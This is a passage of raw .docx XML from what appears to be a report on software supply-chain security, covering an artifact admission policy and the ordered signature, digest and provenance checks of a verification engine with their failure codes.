        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2608"/>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="3288"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rule (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>verifier/policy.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Default value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blocks</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Trusted signers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Vendor Release Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifests claiming any other signer (UNAUTHORIZED_KEY)</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Allowed key IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>vendor_primary_v1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>vendor_primary_v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rogue or unknown keys (UNAUTHORIZED_KEY)</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Revoked versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0.8.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0.9.0-vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Replay of known-vulnerable releases (BLOCKED)</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Minimum version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>1.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Downgrade to older releases (BLOCKED)</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Provenance required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Releases without provenance (BLOCKED)</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Approved source repositories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>https://github.com/vendor/secure-uploader.git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Builds from unapproved sources (BLOCKED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security tests passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Provenance flag must be true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Releases whose build-time tests failed (BLOCKED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.9 Customer Verification Engine and CI/CD Security Gate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5832000" cy="823522"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="verification_pipeline.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="823522"/>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5.4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Verification stages in verifier/verify.py and the status code of each failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ArtifactVerifier.verify()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs the stages in order and stops at the first failure (fail-fast). It returns a verdict, a status code, a message and the time taken, and writes every outcome to the audit log with action DEPLOY or BLOCK. The order is deliberate. Cheap structural checks and revocation run first, then the policy, then the cryptographic signature, and finally the digest of the actual bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Verification stages</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="680"/>
        <w:gridCol w:w="5556"/>
        <w:gridCol w:w="2721"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Failure status</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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Artifact and manifest files exist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>FILE_NOT_FOUND / MANIFEST_NOT_FOUND</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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifest schema: required fields and types; algorithm = SHA-256; signature_algorithm = Ed25519</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_MANIFEST</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Signing key not in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>keys/revoked_keys.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>REVOKED</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Admission policy: signer, key ID, revoked or minimum version, provenance, approved repository, tests passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_KEY (signer/key) or BLOCKED</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trusted public key exists, and the Ed25519 signature over the canonical manifest is valid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_KEY / INVALID_SIGNATURE</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Recomputed SHA-256 of the downloaded artifact equals </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>manifest.sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HASH_MISMATCH</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Provenance </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>artifact_sha256</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> equals the verified digest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PROVENANCE_MISMATCH</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5556"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>All stages pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
